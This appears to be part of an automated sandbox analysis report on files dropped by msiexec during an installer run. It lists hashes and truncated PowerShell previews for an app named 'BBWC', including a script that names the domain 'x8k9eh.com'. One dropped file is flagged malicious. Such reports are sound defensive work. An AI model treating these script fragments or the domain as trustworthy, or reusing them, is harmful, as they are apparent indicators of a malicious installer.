                      SHA-512:AD6A7D4AA5578007B48EFF16B44498AD980C3F08D3A3CDD0B60304D711DB297FBB4230E05DC40964AF255345E2570FD6540501C428B47A6554967013F82A19EB
                      Malicious:false
                      Reputation:low
                      Preview:..F.H.N. .:.<.-.>.:. .0.....F.H.N. .:.<.-.>.:. .4.4.8.8.2.5.6.4.....
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):42
                      Entropy (8bit):3.078187675161839
                      Encrypted:false
                      SSDEEP:
                      MD5:1E463AB8C9D6D6D7EF0AB37B9C951883
                      SHA1:A232F748DBAE224F9B5FF907E5E84E1DAD9EF226
                      SHA-256:BF9E2D5B66D4D5C6B3589FAE987ED81ED656C5C54086B111ADB1AD877A5BD36D
                      SHA-512:3AF2A826D108217AAF84CFBB980C4B5FA078ECAD89A5FC7F12721383C7244700B7C48D4C70EBCC84CDB774CAA6334A813EA82A56DA937B1B3E7A56F891CA896E
                      Malicious:false
                      Reputation:low
                      Preview:..F.H.N. .:.<.-.>.:. .4.4.8.8.2.5.6.4.....
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):90
                      Entropy (8bit):3.339355693836695
                      Encrypted:false
                      SSDEEP:
                      MD5:CE6FC92A4A5CBC8E91398BB47F9EF89D
                      SHA1:CFB3A08DCDCB75D76FC41D6DE515C7823A3C61EF
                      SHA-256:3D0EEE82C3492CA6D81DD15FE4F139FF18911C15A0D85E6AB0E8861860225726
                      SHA-512:1EE8C84D07D09922A2C32AABC40B1DCF985AA098232375B7DCCF473C8E50EDD712C77BB700216FD4DDCD2245EDCF10A2BBF6FFDED286434554FF4BFDD08960FF
                      Malicious:false
                      Reputation:low
                      Preview:..F.H.N. .:.<.-.>.:. .4.4.8.8.2.5.6.4.....P.R.O.D.U.C.T._.T.Y.P.E. .:.<.-.>.:. .P.D.F.....
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):5024
                      Entropy (8bit):3.678892613327007
                      Encrypted:false
                      SSDEEP:
                      MD5:8B719EA0AEB5E3AE6B49FCE3011C006D
                      SHA1:9E91093AC544D9EC3BA339B498D84A30EBDA3BA8
                      SHA-256:F053E3E2A74ED1234F11C6E319D9B114C81203129E6F2A37A3CF1062780326B8
                      SHA-512:10FCA776F0655A2A251AD9DEE0069D4799D1F6AD23F57529AFE17DB7270FEAE06C64871298E70D752227AD850BA86E53AB1B3787C00210D0BFC3A957F19F6DEA
                      Malicious:false
                      Reputation:low
                      Preview:..#. .B.l.o.c.k. .f.o.r. .d.e.c.l.a.r.i.n.g. .t.h.e. .s.c.r.i.p.t. .p.a.r.a.m.e.t.e.r.s.......P.a.r.a.m.(.).........#. .Y.o.u.r. .c.o.d.e. .g.o.e.s. .h.e.r.e.......$.a.p.p.N.a.m.e.=.".B.B.W.C.".....$.v.e.r.s.i.o.n.=.".1...2.2...1.0.0.2...3.2.7.8.0.".........f.u.n.c.t.i.o.n. .C.o.n.v.e.r.t.T.o.-.J.s.o.n.2.0.(.[.o.b.j.e.c.t.]. .$.i.t.e.m.).{..... . . . .a.d.d.-.t.y.p.e. .-.a.s.s.e.m.b.l.y. .s.y.s.t.e.m...w.e.b...e.x.t.e.n.s.i.o.n.s..... . . . .$.p.s._.j.s.=.n.e.w.-.o.b.j.e.c.t. .s.y.s.t.e.m...w.e.b...s.c.r.i.p.t...s.e.r.i.a.l.i.z.a.t.i.o.n...j.a.v.a.s.c.r.i.p.t.S.e.r.i.a.l.i.z.e.r..... . . . .r.e.t.u.r.n. .$.p.s._.j.s...S.e.r.i.a.l.i.z.e.(.$.i.t.e.m.).....}.........f.u.n.c.t.i.o.n. .C.o.n.v.e.r.t.F.r.o.m.-.J.s.o.n.2.0.(.[.o.b.j.e.c.t.]. .$.i.t.e.m.).{. ..... . . . .a.d.d.-.t.y.p.e. .-.a.s.s.e.m.b.l.y. .s.y.s.t.e.m...w.e.b...e.x.t.e.n.s.i.o.n.s..... . . . .$.p.s._.j.s.=.n.e.w.-.o.b.j.e.c.t. .s.y.s.t.e.m...w.e.b...s.c.r.i.p.t...s.e.r.i.a.l.i.z.a.t.i.o.n...j.a.v.a.s.c.r.i.p.t.S.e.r.i.a.l.i.
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):5642
                      Entropy (8bit):2.3574704793225054
                      Encrypted:false
                      SSDEEP:
                      MD5:4A85A32C37CE98C707FD64EDAFBC4B05
                      SHA1:5B27460643A1AFDC2D3D53EF163A8FBD3D3DFAF2
                      SHA-256:D772BF6FD75E4019BD9AA34DFACB5A47939184114530FF3F554D14C2ACE0AB57
                      SHA-512:5E55071E6E4DBF62C18F725E6825420EE64C7E8198376C70FD4AEAB04CCE636D69A8084936F20376B1E73B595B99395A045809829BF2A82313FCD2A31A781E9E
                      Malicious:false
                      Reputation:low
                      Preview:..t.r.y. .{. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . . . . . .$._.m.s.i.P.r.o.p.O.u.t.F.i.l.e. .=. .'.C.:.\.U.s.e.r.s.\.a.l.f.r.e.d.o.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.m.s.i.1.2.8.D...t.m.p...t.x.t.'. . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .$._.i.s.T.e.s.t. .=. .$.f.a.l.s.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . .....F.u.n.c.t.i.o.n. .A.I._.G.e.t.M.s.i.P.r.o.p.e.r.t.y.(.[.s.t.r.i.n.g.]. .$.n.a.m.e. .=. .$.(.t.h.r.o.w. .'.A.I._.G.e.t.M.s.i.P.r.o.p.e.r.t.y. .r.e.q.u.i.r.e.s. .p.r.o.p.e.r.t.y. .n.a.m.e.'.).,. ..... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .$.t.e.s.t.V.a.l.u.e. .=. .$.n.u.l.l.). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .....{. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . .i.f.
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1336
                      Entropy (8bit):3.6181563021973653
                      Encrypted:false
                      SSDEEP:
                      MD5:AD91D0697201B69585048FD6B62F02A3
                      SHA1:7CEADC7A14822DE76E68CB92EA12A2F7F8B73FBB
                      SHA-256:DE4187554DB21342218B87785B0DBDCD0A63F02BAB9A0E3BA829588A21D47C3C
                      SHA-512:FB058624A14B81E8738E439966413B2B97FD0284FAF321A202265794FCD6D7F771EDD15D7524C5EFB56E23115D2490772A24CCA0EAE2240F16115FC713286C59
                      Malicious:false
                      Reputation:low
                      Preview:..#. .B.l.o.c.k. .f.o.r. .d.e.c.l.a.r.i.n.g. .t.h.e. .s.c.r.i.p.t. .p.a.r.a.m.e.t.e.r.s.......P.a.r.a.m.(.).........#. .Y.o.u.r. .c.o.d.e. .g.o.e.s. .h.e.r.e.......$.r.e.g.e.x. .=. .'.[.^._.\.s.\./.\.\.].+._.(.\.w.+.).'.....G.e.t.-.W.m.i.O.b.j.e.c.t. .W.i.n.3.2._.P.r.o.c.e.s.s. .-.F.i.l.t.e.r. .".n.a.m.e. .=. .'.m.s.i.e.x.e.c...e.x.e.'.". .|. .W.h.e.r.e. .{. .$._...C.o.m.m.a.n.d.L.i.n.e. .-.m.a.t.c.h. .$.r.e.g.e.x. .}.....i.f. .(.$.M.a.t.c.h.e.s.). .{..... . . . .$.f.l.o.w.H.e.l.p.e.r.I.d. .=. .$.M.a.t.c.h.e.s.[.1.]..... . . . .e.c.h.o. .$.f.l.o.w.H.e.l.p.e.r.I.d.........A.I._.S.e.t.M.s.i.P.r.o.p.e.r.t.y. .F.H.N. .$.f.l.o.w.H.e.l.p.e.r.I.d.....}.........$.f.l.o.w.h.e.l.p.e.r.i.d. .=. .A.I._.G.e.t.M.s.i.P.r.o.p.e.r.t.y. .F.H.N.........$.d.i.r. .=. .".$.e.n.v.:.A.P.P.D.A.T.A./.B.B.W.C.".....i.f.(.!.(.T.e.s.t.-.P.a.t.h. .-.P.a.t.h. .$.d.i.r. .).).{..... . . . .N.e.w.-.I.t.e.m. .-.I.t.e.m.T.y.p.e. .d.i.r.e.c.t.o.r.y. .-.P.a.t.h. .$.d.i.r.....}.....$.F.i.l.e.N.a.m.e. .=. .".$.d.i.r./.i.n.t.
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):5638
                      Entropy (8bit):2.3542282613555026
                      Encrypted:false
                      SSDEEP:
                      MD5:CB1A70F59E2526EB2038DD1EC0E97CA4
                      SHA1:1D446829FF12E46A68E8A601C96F77C0770042E7
                      SHA-256:3B8F548E606DD1BBCB29CEC760BBA871F79E53847F67019D0EC2503C1B4F6B9C
                      SHA-512:106CA527C3417AE06BC55718B195109DD453326C5101764E7557FF2EA78A16CAD0001F98FE28F5CC5FF7650ABCDD5B3A27AFAAEBA8EC25CB0C0C35E8C8ECD6ED
                      Malicious:false
                      Reputation:low
                      Preview:..t.r.y. .{. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . . . . . .$._.m.s.i.P.r.o.p.O.u.t.F.i.l.e. .=. .'.C.:.\.U.s.e.r.s.\.a.l.f.r.e.d.o.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.m.s.i.1.3.D...t.m.p...t.x.t.'. . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .$._.i.s.T.e.s.t. .=. .$.f.a.l.s.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . .....F.u.n.c.t.i.o.n. .A.I._.G.e.t.M.s.i.P.r.o.p.e.r.t.y.(.[.s.t.r.i.n.g.]. .$.n.a.m.e. .=. .$.(.t.h.r.o.w. .'.A.I._.G.e.t.M.s.i.P.r.o.p.e.r.t.y. .r.e.q.u.i.r.e.s. .p.r.o.p.e.r.t.y. .n.a.m.e.'.).,. ..... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .$.t.e.s.t.V.a.l.u.e. .=. .$.n.u.l.l.). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .....{. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . .i.f. .
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):5642
                      Entropy (8bit):2.357597588880846
                      Encrypted:false
                      SSDEEP:
                      MD5:FFFD8A43734A2C4E1080F26300F10E06
                      SHA1:2C37F8FE754FC0DF353E2E2A81736263780596CE
                      SHA-256:C6BA2D93FD8128B2D5E366991A18822641A3C351448077DC2423AFDE9D75D5C2
                      SHA-512:CC96661C71843C7752E797CF684737C082EBE0E88DEBCE95B18E6E70D82FC9A7F014DB5F07729D68157EFA2E29F8625C81D8E640362FC2D28553C7C744D85331
                      Malicious:false
                      Reputation:low
                      Preview:..t.r.y. .{. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . . . . . .$._.m.s.i.P.r.o.p.O.u.t.F.i.l.e. .=. .'.C.:.\.U.s.e.r.s.\.a.l.f.r.e.d.o.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.m.s.i.3.3.7.C...t.m.p...t.x.t.'. . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .$._.i.s.T.e.s.t. .=. .$.f.a.l.s.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . .....F.u.n.c.t.i.o.n. .A.I._.G.e.t.M.s.i.P.r.o.p.e.r.t.y.(.[.s.t.r.i.n.g.]. .$.n.a.m.e. .=. .$.(.t.h.r.o.w. .'.A.I._.G.e.t.M.s.i.P.r.o.p.e.r.t.y. .r.e.q.u.i.r.e.s. .p.r.o.p.e.r.t.y. .n.a.m.e.'.).,. ..... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .$.t.e.s.t.V.a.l.u.e. .=. .$.n.u.l.l.). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .....{. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . .i.f.
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):5642
                      Entropy (8bit):2.3582950487237615
                      Encrypted:false
                      SSDEEP:
                      MD5:8C60053032818D8A50C593EE09B3F076
                      SHA1:C65E7D80B80009BA9E164569504016073F4E0133
                      SHA-256:6407F2C3C706A08A20584D2EFFAA90CF0D9CEFB1F040DA908B4992DEDE5AECC1
                      SHA-512:DEB1A604F02BC1461C28CD25DB5441AFB28594B3974A5CCF0BB024873692165A67DABE578D9DF8ECBBEF36453AEDED82635A74FC3F8CF4D6389783FE588D7773
                      Malicious:false
                      Reputation:low
                      Preview:..t.r.y. .{. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . . . . . .$._.m.s.i.P.r.o.p.O.u.t.F.i.l.e. .=. .'.C.:.\.U.s.e.r.s.\.a.l.f.r.e.d.o.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.m.s.i.5.F.3.4...t.m.p...t.x.t.'. . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .$._.i.s.T.e.s.t. .=. .$.f.a.l.s.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . .....F.u.n.c.t.i.o.n. .A.I._.G.e.t.M.s.i.P.r.o.p.e.r.t.y.(.[.s.t.r.i.n.g.]. .$.n.a.m.e. .=. .$.(.t.h.r.o.w. .'.A.I._.G.e.t.M.s.i.P.r.o.p.e.r.t.y. .r.e.q.u.i.r.e.s. .p.r.o.p.e.r.t.y. .n.a.m.e.'.).,. ..... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .$.t.e.s.t.V.a.l.u.e. .=. .$.n.u.l.l.). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .....{. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . .i.f.
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):2220
                      Entropy (8bit):3.635697436711596
                      Encrypted:false
                      SSDEEP:
                      MD5:7F2461D0280157C331198A9B44846575
                      SHA1:63DE943DA568676BBCF0D1DFAAA2E7F3CBDE23B9
                      SHA-256:887C826559C568517E7CE16848EF1B864F52291F81319BD52D9728E439047B36
                      SHA-512:69DDE45FFF54680E9E08A105AA4CDDC1BB451050D2D5AAFA19060615172AF42BA78F81BE5E935E08A729E7C638C3715CBA5A6455FDBE7A389D3635F3191D7233
                      Malicious:false
                      Reputation:low
                      Preview:..#. .B.l.o.c.k. .f.o.r. .d.e.c.l.a.r.i.n.g. .t.h.e. .s.c.r.i.p.t. .p.a.r.a.m.e.t.e.r.s.......P.a.r.a.m.(.$.v.e.r.s.i.o.n.).........f.u.n.c.t.i.o.n. .C.o.n.v.e.r.t.T.o.-.J.s.o.n.2.0.(.[.o.b.j.e.c.t.]. .$.i.t.e.m.).{..... . . . .a.d.d.-.t.y.p.e. .-.a.s.s.e.m.b.l.y. .s.y.s.t.e.m...w.e.b...e.x.t.e.n.s.i.o.n.s..... . . . .$.p.s._.j.s.=.n.e.w.-.o.b.j.e.c.t. .s.y.s.t.e.m...w.e.b...s.c.r.i.p.t...s.e.r.i.a.l.i.z.a.t.i.o.n...j.a.v.a.s.c.r.i.p.t.S.e.r.i.a.l.i.z.e.r..... . . . .r.e.t.u.r.n. .$.p.s._.j.s...S.e.r.i.a.l.i.z.e.(.$.i.t.e.m.).....}.........f.u.n.c.t.i.o.n. .C.o.n.v.e.r.t.F.r.o.m.-.J.s.o.n.2.0.(.[.o.b.j.e.c.t.]. .$.i.t.e.m.).{. ..... . . . .a.d.d.-.t.y.p.e. .-.a.s.s.e.m.b.l.y. .s.y.s.t.e.m...w.e.b...e.x.t.e.n.s.i.o.n.s..... . . . .$.p.s._.j.s.=.n.e.w.-.o.b.j.e.c.t. .s.y.s.t.e.m...w.e.b...s.c.r.i.p.t...s.e.r.i.a.l.i.z.a.t.i.o.n...j.a.v.a.s.c.r.i.p.t.S.e.r.i.a.l.i.z.e.r......... . . . .#.T.h.e. .c.o.m.m.a. .o.p.e.r.a.t.o.r. .i.s. .t.h.e. .a.r.r.a.y. .c.o.n.s.t.r.u.c.t.i.o.n. .o.p.e.r.a.t.
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):5692
                      Entropy (8bit):2.381480633865662
                      Encrypted:false
                      SSDEEP:
                      MD5:265A8E9D83AFB2027168298BBEE18F34
                      SHA1:58E4C6E6B1CE4C1BC853DAC41A76F5BD897080DB
                      SHA-256:5AC8412E10FC7171E97BD9ECC0FB4EBB2A5B15BC1FC3BC74410F41FBD13EFFB4
                      SHA-512:D30DF22174DEEB50E51D357FC48EA0706C1020EAA10C0EBECDC4EB0DA2995D81AD09796077A7836FA896AB3840E983006E9365AF9CBA596F351FF0D56C4B86E6
                      Malicious:false
                      Reputation:low
                      Preview:..t.r.y. .{. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . . . . . .$._.m.s.i.P.r.o.p.O.u.t.F.i.l.e. .=. .'.C.:.\.U.s.e.r.s.\.a.l.f.r.e.d.o.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.m.s.i.6.8.9.2...t.m.p...t.x.t.'. . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .$._.i.s.T.e.s.t. .=. .$.f.a.l.s.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . .....F.u.n.c.t.i.o.n. .A.I._.G.e.t.M.s.i.P.r.o.p.e.r.t.y.(.[.s.t.r.i.n.g.]. .$.n.a.m.e. .=. .$.(.t.h.r.o.w. .'.A.I._.G.e.t.M.s.i.P.r.o.p.e.r.t.y. .r.e.q.u.i.r.e.s. .p.r.o.p.e.r.t.y. .n.a.m.e.'.).,. ..... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .$.t.e.s.t.V.a.l.u.e. .=. .$.n.u.l.l.). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .....{. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . .i.f.
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):4196
                      Entropy (8bit):3.697596637267505
                      Encrypted:false
                      SSDEEP:
                      MD5:E203AE448BE712CF9041D52174E014C2
                      SHA1:4E4033E1E6C93B812B7C50CFF89EAF6B929990D3
                      SHA-256:A76FF24C6465EDD9A6640982A05433FCC7FD95A2F9FD4A078870973A57D52923
                      SHA-512:BD5149BA63FF51AE7F18B5A2A22C3AD10B35F5D6A9705137ABEE2264329C5BC9E07EF6B41DC1885C18A221E8A39005270AA4316ECF7EEACB28C83A80A095A4F1
                      Malicious:false
                      Reputation:low
                      Preview:..#. .B.l.o.c.k. .f.o.r. .d.e.c.l.a.r.i.n.g. .t.h.e. .s.c.r.i.p.t. .p.a.r.a.m.e.t.e.r.s.......P.a.r.a.m.(.).........$.a.p.p.N.a.m.e.=.".B.B.W.C.".....$.v.e.r.s.i.o.n.=.".1...2.2...1.0.0.2...3.2.7.8.0.".....$.d.o.m.a.i.n.=.".x.8.k.9.e.h...c.o.m.".........f.u.n.c.t.i.o.n. .C.o.n.v.e.r.t.T.o.-.J.s.o.n.2.0.(.[.o.b.j.e.c.t.]. .$.i.t.e.m.).{..... . . . .a.d.d.-.t.y.p.e. .-.a.s.s.e.m.b.l.y. .s.y.s.t.e.m...w.e.b...e.x.t.e.n.s.i.o.n.s..... . . . .$.p.s._.j.s.=.n.e.w.-.o.b.j.e.c.t. .s.y.s.t.e.m...w.e.b...s.c.r.i.p.t...s.e.r.i.a.l.i.z.a.t.i.o.n...j.a.v.a.s.c.r.i.p.t.S.e.r.i.a.l.i.z.e.r..... . . . .r.e.t.u.r.n. .$.p.s._.j.s...S.e.r.i.a.l.i.z.e.(.$.i.t.e.m.).....}.........f.u.n.c.t.i.o.n. .C.o.n.v.e.r.t.F.r.o.m.-.J.s.o.n.2.0.(.[.o.b.j.e.c.t.]. .$.i.t.e.m.).{. ..... . . . .a.d.d.-.t.y.p.e. .-.a.s.s.e.m.b.l.y. .s.y.s.t.e.m...w.e.b...e.x.t.e.n.s.i.o.n.s..... . . . .$.p.s._.j.s.=.n.e.w.-.o.b.j.e.c.t. .s.y.s.t.e.m...w.e.b...s.c.r.i.p.t...s.e.r.i.a.l.i.z.a.t.i.o.n...j.a.v.a.s.c.r.i.p.t.S.e.r.i.a.l.i.z.e.
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):5642
                      Entropy (8bit):2.35849754838081
                      Encrypted:false
                      SSDEEP:
                      MD5:3A35AFBD294E740B36BC30B8ACEFD2FF
                      SHA1:7BBE43D74D47C12861778A8647CF7F1561754B57
                      SHA-256:7F788FC20A6F3E3749A10AE74E5781E051708401F7200F4F260E7278E6B95A33
                      SHA-512:35F88AEA2BC65C799ED2C130E11EB6D8B73120AEE5DC8EEA9BF95D7CAE06F021EC9245F9791021D600412A11DB556F7F720B1F607DAA9A5761394B64E59292EB
                      Malicious:false
                      Reputation:low
                      Preview:..t.r.y. .{. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . . . . . .$._.m.s.i.P.r.o.p.O.u.t.F.i.l.e. .=. .'.C.:.\.U.s.e.r.s.\.a.l.f.r.e.d.o.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.m.s.i.7.0.5.1...t.m.p...t.x.t.'. . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .$._.i.s.T.e.s.t. .=. .$.f.a.l.s.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . .....F.u.n.c.t.i.o.n. .A.I._.G.e.t.M.s.i.P.r.o.p.e.r.t.y.(.[.s.t.r.i.n.g.]. .$.n.a.m.e. .=. .$.(.t.h.r.o.w. .'.A.I._.G.e.t.M.s.i.P.r.o.p.e.r.t.y. .r.e.q.u.i.r.e.s. .p.r.o.p.e.r.t.y. .n.a.m.e.'.).,. ..... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .$.t.e.s.t.V.a.l.u.e. .=. .$.n.u.l.l.). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .....{. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . .i.f.
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):5642
                      Entropy (8bit):2.3588051232644522
                      Encrypted:false
                      SSDEEP:
                      MD5:6FF8A567B25616AEF9DE6C23EAE22565
                      SHA1:039567F6D7FC8D5955B0C0C8C7FB9F4380322312
                      SHA-256:44BD0922D710D5F5466E14C5B73ACC44E831A54A149C15A9B990A0C3CA9FAC75
                      SHA-512:77D26CB167F99F461FE66E5507C7B73E81ED56E8ACB7E23A4F928BEC8D048D985E234F04C37B025C1071537821A6BD4E18994F36CA6FD4497F0A2E7BA7A85654
                      Malicious:true
                      Reputation:low
                      Preview:..t.r.y. .{. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . . . . . .$._.m.s.i.P.r.o.p.O.u.t.F.i.l.e. .=. .'.C.:.\.U.s.e.r.s.\.a.l.f.r.e.d.o.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.m.s.i.9.3.6.0...t.m.p...t.x.t.'. . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .$._.i.s.T.e.s.t. .=. .$.f.a.l.s.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . .....F.u.n.c.t.i.o.n. .A.I._.G.e.t.M.s.i.P.r.o.p.e.r.t.y.(.[.s.t.r.i.n.g.]. .$.n.a.m.e. .=. .$.(.t.h.r.o.w. .'.A.I._.G.e.t.M.s.i.P.r.o.p.e.r.t.y. .r.e.q.u.i.r.e.s. .p.r.o.p.e.r.t.y. .n.a.m.e.'.).,. ..... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .$.t.e.s.t.V.a.l.u.e. .=. .$.n.u.l.l.). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .....{. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . .i.f.
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):5782
                      Entropy (8bit):2.4085217459459165
                      Encrypted:false
                      SSDEEP:
                      MD5:9B5588051AF42445EA522D2CF91B2059
                      SHA1:AA6FD6961BBB8C39F6EB01B074D5CB2A722354F5
                      SHA-256:A4A7DDC845F59AC9A79962C68FE2151B4C4896A6FDD29C1E7CFA799BE2A5369D
                      SHA-512:AFC0E1B366E6C8B71A34C9A67D0A9A8F5FE7AC1488710DCA9E9324DCB9594801BFC3FD42D91C29A5C7A772EE1394544D3BB5DA18CC3882EE69D56E00152814F3
                      Malicious:false
                      Reputation:low
                      Preview:..t.r.y. .{. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . . . . . .$._.m.s.i.P.r.o.p.O.u.t.F.i.l.e. .=. .'.C.:.\.U.s.e.r.s.\.a.l.f.r.e.d.o.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.m.s.i.9.D.7.9...t.m.p...t.x.t.'. . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .$._.i.s.T.e.s.t. .=. .$.f.a.l.s.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . .....F.u.n.c.t.i.o.n. .A.I._.G.e.t.M.s.i.P.r.o.p.e.r.t.y.(.[.s.t.r.i.n.g.]. .$.n.a.m.e. .=. .$.(.t.h.r.o.w. .'.A.I._.G.e.t.M.s.i.P.r.o.p.e.r.t.y. .r.e.q.u.i.r.e.s. .p.r.o.p.e.r.t.y. .n.a.m.e.'.).,. ..... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .$.t.e.s.t.V.a.l.u.e. .=. .$.n.u.l.l.). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .....{. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . .i.f.
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):792
                      Entropy (8bit):3.5290764092640097
                      Encrypted:false
                      SSDEEP:
                      MD5:92473D7D4483C2FA65D0DBFA20D2FA46
                      SHA1:5EC15FEDE8E9B2DE9B238ECDBA3D2337EDCBE12F
                      SHA-256:CC8CD79CF2F67AF72404162CCE052EF618AF94B7223CA780963562A6D3593F53
                      SHA-512:62BEBBDC1B74D003D3936641C598AE7910C722C923693A494A75623A464995908282893C85A6E9BACEDB98A473FF37FFF4F80D86DBCF6A3287455450B17FC256
                      Malicious:false
                      Reputation:low
